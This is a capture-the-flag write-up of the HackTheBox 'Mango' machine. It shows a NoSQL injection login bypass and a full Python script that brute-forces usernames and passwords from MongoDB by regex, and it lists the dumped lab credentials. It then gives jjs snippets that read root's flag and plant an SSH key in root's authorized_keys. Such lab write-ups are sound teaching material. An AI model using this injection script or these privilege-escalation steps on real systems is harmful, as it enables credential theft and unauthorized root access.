Mango [HackTheBox] HTB
Hello guys mango is going to getting retired today and i have decided to release a write up on it. The box was rated to be a medium box and it had the IP address of 10.10.10.162. The name Mango was a great hint to anyone tackling the box since for the initial foothold you had to exploit Mongo database which was vulnerable to nosql injection and dump user credentials from the database then use those credential to ssh into the box. But there are two rabbitholes in this box that wasted much of my time in this box am gonna go through both of them and show you how i got out. Without much say lets jump in
As always we’ll begin off with an Nmap scan
We see there are 3 ports open ssh,http and https. Port 443(https) exposes the hostname of the box (staging-order.mango.htb). I added the hostname to my hosts file (/etc/hosts)
And navigated to the site using Mozilla both port 80 and port 443
Port 80 (http) is hosting a simple website that requires credentials to login
While port 443 is hosting a google like Web crawler that is used to search for informational. This was my first rabbithole. I was trying for a long time to dump credentials from the database using this search bar but i was unsuccessful
So i decided to focus my attention on port 80 which contained the login page. My first approach was to try and bypass the authentication mechanism and that was pretty straightforward i just used burpsuite and some nosql injection payloads
By adding [$ne] before the username and password we get a 302 Found which directs us to the the homepage of the website this was the second rabbithole
The page had nothing but the information presented above. After much thought i decided to see if there was a way that i could dump user credentials the same way sqlmap does dump credentials from the database
I found the following script modified it a little bit to my liking and ran it.
Here’s the python script script
###########################################
import requests
import string
url = “http://staging-order.mango.htb/"
headers = {“Host”: “staging-order.mango.htb”}
cookies = {“PHPSESSID”: “jo7dctnivj75pdtnkrc2k910ji”}
possible_chars = list(string.ascii_letters) + list(string.digits) + [“\\”+c for c in string.punctuation+string.whitespace ]
def get_password(username):
print(“Extracting password of “+username)
params = {“username”:username, “password[$regex]”:””, “login”: “login”}
password = “^”
while True:
for c in possible_chars:
params[“password[$regex]”] = password + c + “.*”
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
password += c
break
if c == possible_chars[-1]:
print(“Found password “+password[1:].replace(“\\”, “”)+” for username “+username)
return password[1:].replace(“\\”, “”)
def get_usernames():
usernames = []
params = {“username[$regex]”:””, “password[$regex]”:”.*”, “login”: “login”}
for c in possible_chars:
username = “^” + c
params[“username[$regex]”] = username + “.*”
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
print(“Found username starting with “+c)
while True:
for c2 in possible_chars:
params[“username[$regex]”] = username + c2 + “.*”
if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:
username += c2
print(username)
break
if c2 == possible_chars[-1]:
print(“Found username: “+username[1:])
usernames.append(username[1:])
break
return usernames
for u in get_usernames():
get_password(u)
############################################
After about 20 minutes it was able to dump credentials of two user
- Admin with password :t9KcS3>!0B#2
- Mango with password : h3mXK8RhU~f{]f5H
I tried to ssh into the box using admins credentials and it didn’t work then tried to ssh using Mango’s credentials and voila !!! I had a shell in the box
I tried to escalate my privilege to admin user using the same credential and it worked.
Now it’s time to escalate out privileges to root
In the admin user directory there was a .jjshistory file the really looked odd . I decided to run linpeas since i did know what to do with file
We find that there is a high chance we can exploit jjs to get root ptiviledges.
JJS binary is also owned by root and user admin hence making it an exploit path
Using GTFOBins there is a way we can use jjs to read file and also write file
1ST METHOD : Getting root flag using jjs
Bellow is the command that i used to obtain root flag in the box(The command bellow can be found in GTFOBins i’ve left the link above)
###########################################
var BufferedReader = Java.type(“java.io.BufferedReader”);
var FileReader = Java.type(“java.io.FileReader”);
var br = new BufferedReader(new FileReader(“/root/root.txt”));
while ((line = br.readLine()) != null) { print(line); };
exit()
###########################################
And voila !!!! we have the root flag
2ND METHOD: Uploading our very own generated ssh public key using the write function in jjs and using our own generated private key to ssh into the box as root
First we have to generate our own ssh keys
Then using the bellow jjs command upload our public key and saving it in .ssh root directory as authorized_keys
############################################
var FileWriter = Java.type(“java.io.FileWriter”);
var fw=new FileWriter(“/root/.ssh/authorized_keys”);
fw.write(“###YOUR OWN SSH PUBLIC KEY###”);
fw.close();
############################################
After uploading the public key, give the ssh private key proper permissions and using it to log into the box using ssh
And we are root now it is time to submit the flags and get the points
That was it for now guys till next time take care and if you liked the walkthrough you can clap for me down below